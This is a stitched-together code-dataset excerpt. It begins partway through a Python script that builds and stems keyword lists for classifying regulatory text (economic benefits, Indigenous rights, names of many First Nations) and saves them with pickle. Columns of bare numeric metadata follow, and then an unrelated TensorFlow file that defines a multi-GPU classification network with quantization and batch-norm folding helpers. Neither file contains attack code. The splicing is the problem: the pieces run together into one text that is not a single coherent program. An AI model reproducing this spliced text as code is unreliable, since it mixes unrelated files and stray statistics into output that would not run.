labor
labour
development plan
labour services
economic participation
project requirements
dollar value
contract value
worker
workforce
work force
revenue
tax levee
employment
unemployment
education level
skill level
economic condition
direct revenue
indirect revenue
hardship
displacement
economic benefits plan
cooperation agreement
bid
qualification
income
compensation
partnership
collaboration
distribution
outreach
commitment
financial
benefits
monitoring
environmental monitoring certificate program"""
Treaty_and_Indigenous_Rights = """Rights of Indigenous Peoples
potential rights
established rights
asserted rights
protected rights
section 35 rights
Indian Act
Constitution Act, 1982
Constitution Act
section 35
s. 35
Indigenous
Aboriginal
Native
Indian
Métis
Metis
Inuit
Inuk
Communities
Nation
Band
Tribe
Settlement
Treaty
Crown Land
Traditional Land
territory
Traditional Territory
Traditional Knowledge
IK
OIK
TK
Elder
knowledge keeper
knowledge holder
rights-bearing
engagement
Indigenous engagement
Aboriginal engagement
Crown
duty to consult
agent of the Crown
early engagement
CER Early Engagement Guide
Indigenous and Northern Affairs Canada
INAC
Crown-Indigenous Relations and Northern Affairs Canada
CIRNAC
Indigenous Services Canada
ISC
infringe
exercise rights
practice rights
customs
traditions
practices
access to lands
access to resources
travel ways
land availability
resource availability
governancy system
Reconciliation
Truth and Reconciliation
TRC
Calls to Action
missing and murdered
MMIW
MMIWG
residential school
United Nations Declaration on the Rights of Indigenous Peoples
UNDRIP
Traditional Knowledge
Hunt
fishing
Harvest
Culturally significant
Culturally modified tree
Gather
Berries
Medicine
Berry picking
Elder
Trapping
engagement
trap
Ceremony
ceremonies
Medicinal
Cultural
First Peoples
rights-bearing
reserves
first nations
shxw’ōwhámel
lheidlit’enneh
whispering pines first nation
kumik elder lodge
tribal
Abenaki
Innu
Montagnais-Naskapi
Oneida
Ahousaht
Interior Salish
Onondaga
Algonquin
Inuinnait
Copper Inuit
Pacheenaht
Assiniboine
Inuvialuit
Mackenzie Inuit
Petun
Atikamekw
Kainai
Piikani
Peigan
Baffin Island Inuit
K'asho Got'ine
Saldermiut Inuit
Beothuk
Kaska Dena
Sahtu Got'ine
Bearlake
Blackfoot Confederacy
Blackfoot
Kivallirmiut
Caribou Inuit
Secwepemc
Shuswap
Cayuga
Ktunaxa
Kootenay
Sekani
Central Coast Salish
Kwakwaka'wakw
Kwakiutl
Seneca
Coast Salish
Kyuquot and Checleseht
Shuta Got'ine
Cree
Labradormiut
Labrador Inuit
Siksika
Dakota
Lilwat
Lillooet
Slavey
Dakelh
Lingit
Tlingit
Stoney-Nakoda
Dane-zaa
Beaver
Syilx
Okanagan
Dene
Mi'kmaq
Tagish
Denesuline
Chipewyan
Mohawk
Tahltan
Ditidaht
Mowachaht-Muchalaht
Tla-o-qui-aht
Clayoquot
Ehattesaht
Nahani
Tlicho
Dogrib
Gitxsan
Gitksan
Netsilingmiut
Netsilik Inuit
Toquaht
Gwich'in
Neutral Confederacy
Tr'ondëk Hwëch'in (Han)
Haida
Nicola-Similkameen
Tseshaht
Sheshaht
Haisla
Kitamaat
Nisga'a
Tsilhqot'in
Chilcotin
Haudenosaunee
Six Nations
Iroquois
Nlaka'pamux
Thompson
Tsimshian
Heiltsuk
Northern Georgia Strait Coast Salish
Tsuut'ina
Sarcee
Hesquiaht
Nuchatlaht
Tutchone
Hupacasath
Opetchesaht
Nunavimmiut
Ungava Inuit
Uchucklesaht
Huu-ay-aht
Nuu-chah-nulth
Ucluelet
Huron-Wendat
Nuxalk
Bella Coola
Wolastoqiyik
Maliseet
Iglulingmuit
Iglulik Inuit
Odawa
Wetal
Tsetsaut
Ojibwa
Yellowknives
popkum first nation
leq’á:mel first nation
alexander first nation
samson cree first nation
o’chiese first nation
ermineskin cree nation
enoch cree nation
eskimo
?Akisq'nuk
?Esdilagh
'Namgis
Aamjiwnaang
Fort Liard
Adams Lake
Ahousaht
Ahtahkakoop
&Abrevethélets
Aklavik
Tobacco Plains
Ahkwesáhsne Kanien'kehá:ka
Alderville
Alexander
Alexis Nakota Sioux
Tsi Del Del
Alkali Lake
Anaham
Anderson Lake
Animbiigoo Zaagi'igan Anishinaabek
Big Island
Anishinabe of Wauzhushk Onigum
St. Mary's
Ikpiarjuk
Tsiigehtchic
Aseniwuche Winewak
Ashcroft
Athabasca Chipewyan
Whitefish Lake
Attawapiskat
Aundeck-Omni-Kaning
Grise Fiord
Awaetlala
Peerless Trout
Barren Lands
Batchewana
Beardy's and Okemasis'
Bearskin Lake
Beausoleil
Beaver
Beaver Lake
Scia'new
Fort Norman
Behdzi Ahda"
Heíltsuk
Nuxalk
Big Cove
Joseph Bighead Cree
Big River
Bigstone Cree
Birch Narrows
Birdtail Sioux
Walpole Island
Stony Rapids
Little Black River
Marcel Colomb
Blood
Bloodvein
Blueberry River
Montana Cree
St'uxtews
Boothroyd
Boston Bar
Bridge River
Brokenhead Ojibway
Wet'suwet'en
Qikiqtarjuaq
Brunwick House
Tjipogtotjg
Buffalo Point
Buffalo River Dene
Oxford House
Burns Lake
Burnt Church
Tsleil Waututh
Calling Lake
Cambridge Bay
Wei Wai Kum
Stswecem'c/Xgat'tem
Canoe Lake Cree
Canupawakpa Dakota
Kinngait
Cape Mudge
Carcross/Tagish
Ceg-a-Kin
Cayoose Creek
Ch'iyáqtel
Chacachas
Chakastaypasin
Seton Lake
Champagne and Aishihik
Chawathil
Cheam
Chehalis
Chemainus
Chemawawin Cree
Cheslatta Carrier
Big Bear
Janvier
Chisasibi
Tla-o-qui-aht
Clearwater River Dene
Clyde River
Cold Lake
Coldwater
Comox
Constance Lake
Cook's Ferry
Cote
Cowessess
Cowichan
O-Chi-Chak-Ko-Sipi
Mikisew Cree
Cross Lake
Cumberland House
Dakota Plains Wahpeton
Dakota Tipi
Dauphin River
Day Star
Daylu Dena Council
Skeetchestn
Dease River
Dechi Laot'i
Deh Gah Gotie Dene
Fort Franklin
Dene Tha'
Fort Resolution
Nitinaht
Tli Cho
Doig River
Douglas
Driftpile
Duncan's
Dzawada'enuxw
Ebb and Flow
Natoaganeg
Ehattesaht
Kesyehot'ine
Enoch
Ermineskin Cree
Esdilah
Esquimalt
Fairford
Fisher River Cree
Fishing lake
Flying Dust
Fond du Lac Denesuline
Fort Churchill
Fort Folly
Fort Good Hope
Fort Albany
Fort Alexander
Smith's Landing
Fort George
Fort MacKay
Fort McMurray
Fort McPherson
Fort Nelson
Fort Rupert Band
Liidlii Kue
Fort Smith
Fort Ware
Xaxl'ip
Fox Lake Cree
Nadleh Whut'en
Frog Lake
Gamblers
Rae Lakes
Garden Hill
Gesgapegiag
Gingolx
Gitanmaax
Kitwancool
Gitg'a'ata
Kitkatla
New Aiyansh
Gitsegukla
Kitselas
Gitwangak
Gitwinksihlkw
Gitxsan
Glen Vowell
God's Lake
Manto Sipi
George Gordon
Grand Rapids
Grouard
Gwa'Sala-Nakwaxda'xw
Gwawaenuk
Hagwilget
Haisla
Halalt
Halfway River
Hatchet Lake
Hay River
Heart Lake
Hesquiaht
Tenlenaitmux
Wanipigow
Holman
Homalco
Horse Lake
Hupacasath
Huu-ay-aht
Iglulik
Indian Birch
Indian Island
Inuvik
Iqaluit
Iskut
Ministikwan
Kinonjeoshtegon
James Smith
Jean Marie River
Muskoday
K'ómoks
Ka'a'gee Tu
Ka:'yu:'k't'h'/Che:k:tles7et'h'
Kahkewistahaw
Kahnawà:ke
Kamloops
Kanaka Bar
Kanehsatà:ke
Rankin Inlet
Kaska Nation
Katzie
Poor Man or Lean Man
Keeseekoose
Riding Mountain Band
Kehewin Cree
Kelly Lake
Kelly Lake Cree
Kelly Lake Métis Settlement
Lake Harbour
Kinistin
Kispiox
Kitasoo/Xai'Xais
Kitsumkalum
Klahoose
Kluane
Kluskus
Kwanlin Dun
Kwantlen
Kwaw-Kwaw-Apilt
Kwiakah
Kwicksutaineuk-ah-kwaw-ah-mish
Kwikwetlem
Lac La Martre
Lac La Ronge
Leq'á:mel
Lakalzap
Lake Babine
Lake Cowichan
Lake Manitoba
Lake St. Martin
Lax-Kw'alaams
Lean Man
Lekwungen
Lhtakot'en
Liard
Mount Currie
T'it'q'et
Restigouche
Little Black Bear
Little Grand Rapids
Little Pine
Little Red River Cree
Little Salmon Carmacks
Little Saskatchewan
Skwlax
Long Plain
Loon River
Louis Bull
Yaqan Nukiy
Lower Nicola
Lower Similkameen
Lubicon Lake
Lucky Man
Snowdrift
Lyackson
Lytton
Madawaska Maliseet
Makwa Sahgaiehcan
Malahat
Maliseet
Mamalilikulla-Qwe'Qwa'Sot'Em
Manawan
Mathias Colomb
Matsqui
McLeod Lake
Metlakatla
Miawpukek Mi'kamawey Mawi'omi
La Nation Micmac de Gespeg
Mistawasis
Mittimatalik
Mississaugas of the New Credit
Kenhtë:ke Kanyen'keh·:ka
Montreal Lake Cree
Moose Lake
Moosomin
Moricetown
Mosquito, Grizzly Bear's Head, Lean Man
Mowachaht/Muchalaht
Muscowpetung
Utshimassit
Muskeg Lake
Muskowekwan
Musqueam
N'ahadehe
Na-Cho Nyak Dun
Nak'azdli
Nanoose
Nazko
Nee Tahi Buhn
Nekaneet
Xeni Gwet'in
Nisichawayasihk
Neskonlith
Nicomen
Nisga'a Nation
Nooaitch
Northlands Denesuline
Northwest Angle No. 33
Northwest Angle 37
Simpcw
Norway House
Nuchatlaht
Nunavut
Nuwitti
Nut Lake
Oak Lake
O'Chiese
Sioux Valley Dakota
Ocean Man
Ochapowace
Opitciwan
Odanak
Ohamil
Okanagan
Okanese
Old Masset Village Council
Willow Crees
Onion Lake
Opaskwayak Cree
O-Pipon-Na-Piwin Cree
Oregon Jack Creek
Oromocto
Osoyoos
Oujé Bougoumou Cree
Oweekeno
Pacheedaht
Pangnirtung
Pasqua
Pauingassi
Paul
Paulatuk
Pauquachin
Ts'kw'aylaxw
Peepeekisis
Peguis
Pehdzeh Ki
Selkirk
Peigan
Pelican Lake
Penelakut
Penticton
Peter Ballantyne
Peter Chapman
Peters
Pheasant Rump Nakota
Piapot
Algonquins of Pikwákanagán
Pine Creek
Piyesiw-awasis
Popkum
Poplar River
Poundmaker
Prophet River Band, Dene Tsaa Tse K'Nai
Qalipu Mi'Kmaq
Qausuittuq
Qayqayt
Qualicum
Quatsino
Rat Portage
Red Earth
Red Pheasant
Red Sucker Lake
Rolling River
Roseau River Anishinabe
Ross River
Sachs Harbour
Saddle Lake Cree
Saik'uz
Sakimay
Samahquam
Sambaah Ke Dene
Samson
Sandy Bay
Sapotaweyak
Saulteau
Saulteaux
Sawridge
Scowlitz
Seabird Island
Shishálh
Semiahmoo
Secwepemc
Shackan
Shamattawa
Shoal Lake
Shxwhá:y Village
Sîkîp Sâkahikan
Siksika
Sinixt
Siska
Six Nations
Skatin
Skawahlook
Skidegate
Skin Tyee
Skulkayn
Skownan
Skuppah
Skwah
Tla'Amin
Snuneymuxw
Soda Creek
Soowahlie
Splatsin
Tataskweyak Cree
Spuzzum
Squamish
Squiala
St. Theresa Point
Standing Buffalo Dakota
Star Blanket
Stellat'en
Yunesit'in
Stoney Nakoda
Stony Knoll
Sturgeon Lake
Sturgeon Lake Cree
Sucker Creek, AB
Sucker Creek, ON
T'exelc
Semá:th
Sunchild
Swan Lake
Swan River
Sweetgrass
Ta'an Kwäch'än
Tahltan
Takla Lake
Taku River Tlingit
Tallcree
Teetl'itzheh
Teslin Tlingit
The Key
Tl'azt'en
Tl'esqox
Tli Cho Government
Turner Island
Tobique
Valley River
Toquaht
T'Sou-ke
Tr'on dëk Hwëch'in
Ts'ueh Nda
Tsartlip
Tsawout
Tsawwassen
Tsay Keh Dene
Tseshaht
Tseycum
Tsuu T'ina
Tuktoyaktuk
Uchucklesaht
Ucluelet
Ulkatcho
Union Bar
Upper Nicola
Upper Similkameen
Vuntut Gwitchin
Wahpeton Dakota
War Lake
Wasagamack
Waswanipi Cree
Waywayseecappo
Wemotaci
Nation Huronne Wendat
Westbank
West Moberly
Wet'suwet'en Nation
Whispering Pines/Clinton
White Bear
White River
Whitecap Dakota
Atikameg
Witchekan Lake
Wolastokwik NeGoot-Gook
Wôlinak
Wood Mountain Lakota
Woodland Cree
Wrigley
Yeqwyeqwí:ws
Yale
Yekooche
Yellowknives Dene
York Factory
Columbia Lake
Alexandria
Chippewas of Sarnia
Acho Dene Koe
Sexqeltqin
Aitchelitz
Akun'kunik'
Akwesasne
Redstone Band
Esketemc
Tl'etinqox-t'in
N'quatqua
Lake Nipigon Ojibway
Anishinaabeg of Naongashiing
Aqam
Arctic Bay
Arctic Red River
Grande Cache
Atikameksheng Anishnawbek
Sucker Creek
Ausuittuq
Da'naxda'xw
Bald Hill
Beardy's and Okemasis
Beaver Lake Cree
Beecher Bay
Tulita Dene
Bella Bella
Bella Coola
Elsipogtog
Naongashiing
Big Island Lake
Turnor Lake
Bkejwanong
Black Lake Denesuliné
Makadewaagamijiwanong
Black Sturgeon
Kainai
Bobtail
Bonaparte
Nxwisten
Broman Lake
Broughton Island
Buctouche
Bunibonibee
Ts'il kaz koh
Esgenoopetitj
Burrard
Jean Baptiste Gambler
Ikaluktutiak
Campbell River
Canoe Creek
Cape Dorset
We Wai Kai
Carry the Kettle Nakota
Sekw'el'was
Ch'yaqtel
Tsal'alh
Chi:yo:m
Sts'Ailes
Stz'uminus
Chemawawin
Chief Big Bear
Chipewyan Prairie
Clayoquot
Kangiqtugaapik
Crane River
Cree Chip
Pimicikamak
Waskahikanihk Cree Cree
Lower Post
Deadman's Creek
Wekwèti
Fort Providence
Déline
Deninu K'ue
Ditidaht
Dog Rib Rae
Xa'xtsa
Tsawataineuk
Eel Ground
English River
Ermineskin
Pinaymootang
Fisher River
Sayisi Dene
K'asho Got'ine
Sagkeeng
Fort Fitzgerald Dene
Lheidli T'enneh
Kwawkewlth
Fort Simpson
Salt River 195
Kwadacha
Fountain
Fox Lake
Fraser Lake
Gamèti
Gitanyow
Hartley Bay
Gitkxaala
Gitlakdamix
Gits'ilaasu
God's Lake Narrows
Manto Sipi Cree
Goodfish
Misipawistik Cree
Kapawe'no
Kitamaat
K'atlodeeche
High Bar
Hollow Water
Uluqsaqtuuq
Xwémalhkwu
Ohiaht
Wuskwi Sipihk
Island Lake
Jackhead
Tthe'k'ehdeli
John Smith
Comoks
Kakisa
Kyuquot
Tk'emlúps
Kangiqliniq
Kawacatoose
Keeseekoowenin
Kimmirut
Lhoosk'uz Dene
Kwikwasut'inuxw Haxwa'mis
Wha Ti
Lakahahmen
Laxgalt'Sap
Nat'oot'en
Lapatack Cree
Kawacatoose or Mosquito, Grizzly Bear's Head, Lean Man
Songhees
Red Bluff
Lil'wat
Lillooet
Listuguj
Little Shuswap Lake
Lower Kootenay
Lù'an Män Ku Dän
Lutsel K'e Dene
Maliseet of Viger
Manouane
Mathias Colomb Cree
Tsek'hene
Purtujuq
Mohawks of the Bay of Quinte
Montreal Lake
Mosakahiken
Witset
Mushuau Innu
Petequakey
Nahanni Butte
Nak'azdli Whut'en
Snaw-naw-as
Nemaiah
Nelson House
Northlands
Northwest Angle 33
Northwest Angle No. 37
North Thompson
Norway House Cree
Tlatlasikwala
Yellow Quill
Oak River
Obedjiwan
Shxw'ow'hamel
One Arrow
The Pas
O-Pipon-Na-Piwin
Oujé Bougoumou
Wuikinuvx
Pacheenaht
Panniqtuuq
Pavillion
Pelly Band
Piikani
Peter Ballantyne Cree
Skw'atels
Golden Lake
Thunderchild
Poor Man
Prophet River
Resolute Bay
Onihcikiskowapowin
Stony Creek
Zagime Anishinabek
Trout Lake
White Mud River
Sapotaweyak Cree
Sq'éwlets
Sechelt
Waterhen Lake
Sq'ewá:lxw
Sq'ewq&emacryl
Water Hen
Sliammon
Xatsu'll/Cm'etem
Spallumcheen
Tataskweyak
Stone
Young Chipeeweyan
Sukwekwin
Sumas
Tetlit Gwich'in
Toosey
Tlowitsis-mumtagila
Tootinaowaziibeeng
T'Souke
West Point
Tyendinaga
Weymontachi
Whitefish
Yakweakwioose
Akisq'nuk
Alexis Creek
Gwichya Gwich'in
Atikameksheng Anishnawbek
Tanakteuk
Kapuskwatinak
Begaee Shuhagot'ine
Black River
Xwísten
Tzeachten
Chalath
Waskahikanihk Cree
Poplar House People
Kwakiutl
God's River
Misipawistik
Ulukhaktok
Ministikwan Lake Cree
Mosquito
Pukatawagan
Pond Inlet
Mosakahiken Cree
Necoslie
Whitefish Bay
South Indian Lake
Pikwàkanagàn
Dene Tsaa Tse K'Nai
Saddle Lake
Shoal River
Skowkale
Split Lake
Williams Lake
Tlowitsis
Whitefish Lake, AB
Whitefish Lake (Atikameg)
Peerless Lake
Grizzly Bear's Head
Animakhee Wazhing
Whitefish Lake, ON"""
keywords = [Landscape_terrain_and_weather,
Soil,
Plants,
Water,
Fish,
Wetlands,
Wildlife,
Species_at_Risk,
Greenhouse_gas_emissions,
Air_emissions,
Noise,
Electricity_and_electromagnetism,
Proximity_to_people,
Archaeological_paleontological_historical_and_culturally_significant_sites_and_resources,
Human_access_to_boats_and_waterways,
Indigenous_land_water_and_air_use,
Impact_to_social_and_cultural_well_being,
Impact_to_human_health_and_viewscapes,
Social_cultural_economic_infrastructure_and_services,
Economic_Offsets_and_Impact,
Environmental_Obligations,
Treaty_and_Indigenous_Rights]
keywords = [x.lower().split("\n") for x in keywords]
stemmer = PorterStemmer()
for i, label_keywords in enumerate(keywords):
stemmed_words = []
for word in label_keywords:
token_words = word_tokenize(word)
stemmed_tokens = [stemmer.stem(t) for t in token_words if t not in stopwords.words("english")]
stemmed_words.append(" ".join(stemmed_tokens))
keywords[i] = stemmed_words
print(keywords[0], keywords[1], keywords[2], keywords[3], keywords[4], keywords[5], keywords[6], keywords[7], keywords[8])
with open("keywords.pkl", "wb") as f:
pickle.dump(keywords, f)
| 16.046408
| 122
| 0.863571
| 11,576
| 90,245
| 6.722357
| 0.321095
| 0.004318
| 0.002956
| 0.004318
| 0.793711
| 0.789059
| 0.784356
| 0.783482
| 0.78248
| 0.77883
| 0
| 0.00092
| 0.12096
| 90,245
| 5,624
| 123
| 16.046408
| 0.980007
| 0
| 0
| 0.798213
| 0
| 0
| 0.97406
| 0.002438
| 0
| 0
| 0
| 0
| 0.000179
| 1
| 0
| false
| 0.000536
| 0.001072
| 0
| 0.001072
| 0.000179
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
405efef856e3bfbe9876ef92fe4609e2f34c92b9
| 209,398
|
py
|
Python
|
Train/Net.py
|
shelljane/ApproxFlow
|
e24aea877ebb66a79e4deacf6d635aabb1cb6662
|
[
"MIT"
] | 2
|
2021-03-16T03:29:05.000Z
|
2021-07-28T02:05:05.000Z
|
Train/Net.py
|
FDU-ME-ARC/ApproxFlow
|
e24aea877ebb66a79e4deacf6d635aabb1cb6662
|
[
"MIT"
] | null | null | null |
Train/Net.py
|
FDU-ME-ARC/ApproxFlow
|
e24aea877ebb66a79e4deacf6d635aabb1cb6662
|
[
"MIT"
] | 1
|
2021-04-05T17:39:13.000Z
|
2021-04-05T17:39:13.000Z
|
import tensorflow as tf
import Layer
import numpy as np
from Protocol import Net
from tensorflow.python.ops.array_ops import fake_quant_with_min_max_vars
from tensorflow.python.framework import graph_util
FAKEBITS = Layer.FAKEBITS
PORTION = 1.0
FROM = -1.0
TO = 1.0
HParamDefault = {'NumGPU': 1,
'BatchSize': 50,
'LearningRate': 1e-3,
'MinLearningRate': 1e-5,
'WeightDecay': 1e-5,
'ValidateAfter': 1000,
'LRDecayAfter': 10000,
'LRDecayRate': 0.1,
'TestSteps': 200,
'TotalSteps': 30000}
class Net4Classify(Net):
def __init__(self, inputShape, numClasses, body, HParam=HParamDefault, name='Net4Classify'):
Net.__init__(self, HParam, name)
with self._graph.as_default(), tf.device('/cpu:0'), tf.variable_scope(self._name, reuse=tf.AUTO_REUSE):
# Inputs
self._images = tf.placeholder(dtype=tf.float32, shape=[self._HParam['BatchSize']]+inputShape, name='images')
self._labels = tf.placeholder(dtype=tf.int64, shape=[self._HParam['BatchSize']], name='labels')
self._numClasses = numClasses
self._body = body
self._optimizer = tf.train.AdamOptimizer(self._lr, epsilon=1e-8, use_locking=True)
# Network
if self._HParam['NumGPU'] > 0:
self._imagesGroup = tf.split(self._images, self._HParam['NumGPU'], axis=0)
self._labelsGroup = tf.split(self._labels, self._HParam['NumGPU'], axis=0)
self._gpuBodies = []
self._gpuInferences = []
self._gpuAccuracies = []
self._gpuLosses = []
self._gpuLayers = []
self._lossesList = []
for idx in range(self._HParam['NumGPU']):
with tf.device('/gpu:%d'%idx):
with tf.name_scope('GPU_%d'%idx):
body, layers = self.body(self._imagesGroup[idx])
self._gpuLayers.append(layers)
self._gpuBodies.append(body)
self._gpuInferences.append(self.inference(self._gpuBodies[idx]))
self._gpuAccuracies.append(tf.reduce_mean(tf.cast(tf.equal(self._gpuInferences[idx], self._labelsGroup[idx]), tf.float32)))
self._gpuLosses.append(self.getLoss(layers))
self._gpuLosses[idx] += self.lossFunc(self._gpuBodies[idx], self._labelsGroup[idx])
self._layers = self._gpuLayers[0]
self._postInit()
for idx in range(self._HParam['NumGPU']):
with tf.device('/gpu:%d'%idx):
with tf.name_scope('GPU_%d'%idx):
self._lossesList.append(self._optimizer.compute_gradients(self._gpuLosses[idx], gate_gradients=0))
self._body = tf.concat(self._gpuBodies, axis=0)
self._inference = tf.concat(self._gpuInferences, axis=0)
self._body = tf.concat(self._gpuBodies, axis=0)
self._inference = tf.concat(self._gpuInferences, axis=0)
self._loss = tf.reduce_mean(tf.concat([tf.expand_dims(elem, axis=0) for elem in self._gpuLosses], axis=0), axis=0)
self._accuracy = tf.reduce_mean(tf.concat([tf.expand_dims(elem, axis=0) for elem in self._gpuAccuracies], axis=0), axis=0)
self._updateOps = []
for idx in range(len(self._gpuLayers)):
self._updateOps.extend(self.getUpdateOps(self._gpuLayers[idx]))
applyList = []
for idx in range(len(self._lossesList[0])):
grads = []
for jdx in range(len(self._lossesList)):
grads.append(tf.expand_dims(self._lossesList[jdx][idx][0], axis=0))
applyList.append((tf.reduce_mean(tf.concat(grads, axis=0), axis=0), self._lossesList[0][idx][1]))
self._optimizer = self._optimizer.apply_gradients(applyList, global_step=self._step)
else:
body, layers = self.body(self._images)
self._body = body
self._inference = self.inference(self._body)
self._loss = self.getLoss(layers)
self._accuracy = tf.reduce_mean(tf.cast(tf.equal(self._inference, self._labels), tf.float32))
self._layers = layers
self._updateOps = self.getUpdateOps(layers)
self._postInit()
applyList = self._optimizer.compute_gradients(self._loss, gate_gradients=0)
self._optimizer = self._optimizer.apply_gradients(applyList, global_step=self._step)
# Saver
self._saver = tf.train.Saver(max_to_keep=5)
# Network Graph
# self._writer = tf.summary.FileWriter("./Tensorboard", self._sess.graph)
def _postInit(self):
pass
# tf.contrib.quantize.create_training_graph(input_graph=self._graph, quant_delay=0)
# print(tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES))
def train(self, genTrain, genTest, pathLoad=None, pathSave=None):
with self._graph.as_default():
# Initialize all
self._sess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])
if pathLoad is not None:
self.load(pathLoad)
maxAccu = self.evaluate(genTest)
self._postTrain('./NoTrainWeights')
# self._writer.close()
self._sess.run([self._phaseTrain])
for _ in range(self._HParam['TotalSteps']):
data, label = next(genTrain)
loss, accu, step, _ = self._sess.run([self._loss, self._accuracy, self._step, self._optimizer], \
feed_dict={self._images: data, self._labels: label})
self._sess.run(self._updateOps)
print('\rStep: ', step, '; Loss: %.3f'% loss, '; Accuracy: %.3f'% accu, end='')
if step % self._HParam['ValidateAfter'] == 0:
print('\n')
accu = self.evaluate(genTest)
if pathSave is not None and accu >= maxAccu:
maxAccu = accu
self.save(pathSave)
self._postTrain()
self._sess.run([self._phaseTrain])
def _postTrain(self, path='./QuantWeights'):
pass
def evaluate(self, genTest, path=None):
if path is not None:
self.load(path)
totalLoss = 0.0
totalAccu = 0.0
self._sess.run([self._phaseTest])
for idx in range(self._HParam['TestSteps']):
data, label = next(genTest)
loss, accu = self._sess.run([self._loss, self._accuracy], \
feed_dict={self._images: data, \
self._labels: label})
totalLoss += loss
totalAccu += accu
print('\rTest Step: ', idx, '; Loss: %.3f'% loss, '; Accuracy: %.3f'% accu, end='')
totalLoss /= self._HParam['TestSteps']
totalAccu /= self._HParam['TestSteps']
print('\nTest: Loss: ', totalLoss, '; Accuracy: ', totalAccu, '\n')
return totalAccu
def body(self, images):
# Body
net, layers = self._body(self, images)
logits = Layer.FullyConnected(net, outputSize=self._numClasses, \
weightInit=Layer.XavierInit, wd=self._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(0.0), \
activation=Layer.Linear, \
# bn=True, step=self._step, ifTest=self._ifTest, epsilon=1e-8, \
name='FC_Logits', dtype=tf.float32)
layers.append(logits)
return logits.output, layers
def inference(self, logits):
return tf.argmax(logits, axis=-1, name='inference')
def lossFunc(self, logits, labels, name='cross_entropy'):
net = Layer.CrossEntropy(logits, labels, name=name)
return net.output
def save(self, path):
self._saver.save(self._sess, path, global_step=self._step)
# print(self._sess.graph_def)
# constantGraph = graph_util.convert_variables_to_constants(self._sess, self._sess.graph_def, ['Net4Classify_1/GPU_0/FC_Logits/FinalOutput'])
# with tf.gfile.FastGFile("/".join(path.split("/")[:-1]) + "/saved_model.pb", "wb") as fout:
# fout.write(constantGraph.SerializeToString())
def load(self, path):
self._saver.restore(self._sess, path)
class Net4Quant(Net4Classify):
def __init__(self, inputShape, numClasses, body, pretrained, HParam=HParamDefault, name='Net4Quant'):
self._pretrained = pretrained
self._preInit()
Net4Classify.__init__(self, inputShape, numClasses, body, HParam, name)
def _preInit(self):
# tf.contrib.quantize.create_training_graph(input_graph=self._pretrained._graph, quant_delay=0)
self._pretrained._quantLayers = {}
self._pretrained._haveWeights = {}
self._pretrained._haveBN = {}
self._pretrained._layerInfos = []
self._pretrained._layerNames = []
self._pretrained._layerTypes = []
for idx in range(len(self._pretrained._layers)):
print('Analyzing layer: ', self._pretrained._layers[idx]._name)
name = self._pretrained._layers[idx]._name
layertype = self._pretrained._layers[idx]._type
self._pretrained._layerNames.append(name)
self._pretrained._quantLayers[name] = {}
for varName in self._pretrained._layers[idx]._variables.keys():
if varName == 'Weights':
self._pretrained._haveWeights[name] = True
weights = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['Weights'] = weights
print(self._pretrained._layers[idx]._variables[varName])
elif varName == 'Bias':
self._pretrained._haveWeights[name] = True
bias = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['Bias'] = bias
print(self._pretrained._layers[idx]._variables[varName])
elif varName == 'BN_Offset':
self._pretrained._haveBN[name] = True
offset = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['BN_Offset'] = offset
print(self._pretrained._layers[idx]._variables[varName])
elif varName == 'BN_Scale':
self._pretrained._haveBN[name] = True
scale = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['BN_Scale'] = scale
print(self._pretrained._layers[idx]._variables[varName])
elif varName == 'BN_MovMean':
self._pretrained._haveBN[name] = True
movmean = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['BN_MovMean'] = movmean
print(self._pretrained._layers[idx]._variables[varName])
elif varName == 'BN_MovVar':
self._pretrained._haveBN[name] = True
movvar = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['BN_MovVar'] = movvar
print(self._pretrained._layers[idx]._variables[varName])
act_min = self._pretrained._layers[idx].outMin
self._pretrained._quantLayers[name]['Act_Min'] = act_min
print(act_min)
act_max = self._pretrained._layers[idx].outMax
self._pretrained._quantLayers[name]['Act_Max'] = act_max
print(act_max)
if layertype.find('Conv') >= 0:
info = [self._pretrained._layers[idx]._strideConv[1]]
if self._pretrained._layers[idx]._pool:
layertype += 'Pooling'
info.extend([self._pretrained._layers[idx]._sizePooling[1], self._pretrained._layers[idx]._stridePooling[1]])
self._pretrained._layerInfos.append(info)
elif layertype.find('Pooling') >= 0:
info = [self._pretrained._layers[idx]._sizePooling[1], self._pretrained._layers[idx]._stridePooling[1]]
self._pretrained._layerInfos.append(info)
else:
info = []
self._pretrained._layerInfos.append(info)
self._pretrained._layerTypes.append(layertype)
# print(self._pretrained._layers[idx]._variables)
list(map(lambda l: print(l) or list(map(lambda x: print("\t", x, ":", self._pretrained._quantLayers[l][x]), self._pretrained._quantLayers[l].keys())), self._pretrained._layerNames))
self._preWeights = {}
self._preBias = {}
for idx in range(len(self._pretrained._layerNames)):
name = self._pretrained._layerNames[idx]
layertype = self._pretrained._layerTypes[idx]
print("Copying Layer:", name)
if name in self._pretrained._haveWeights:
weights = self._pretrained._sess.run(self._pretrained._quantLayers[name]['Weights'])
bias = self._pretrained._sess.run(self._pretrained._quantLayers[name]['Bias']) if 'Bias' in self._pretrained._quantLayers[name] else 0.0
act_min = self._pretrained._sess.run(self._pretrained._quantLayers[name]['Act_Min'])
act_max = self._pretrained._sess.run(self._pretrained._quantLayers[name]['Act_Max'])
if name in self._pretrained._haveBN:
offset = self._pretrained._sess.run(self._pretrained._quantLayers[name]['BN_Offset']) if 'BN_Offset' in self._pretrained._quantLayers[name] else 0.0
scale = self._pretrained._sess.run(self._pretrained._quantLayers[name]['BN_Scale']) if 'BN_Scale' in self._pretrained._quantLayers[name] else 1.0
movmean = self._pretrained._sess.run(self._pretrained._quantLayers[name]['BN_MovMean'])
movvar = self._pretrained._sess.run(self._pretrained._quantLayers[name]['BN_MovVar'])
stddev = np.sqrt(movvar + 1e-8)
tmp = scale / stddev
weights = weights * tmp
bias = offset + tmp * (bias - movmean)
self._preWeights[name] = weights
self._preBias[name] = bias
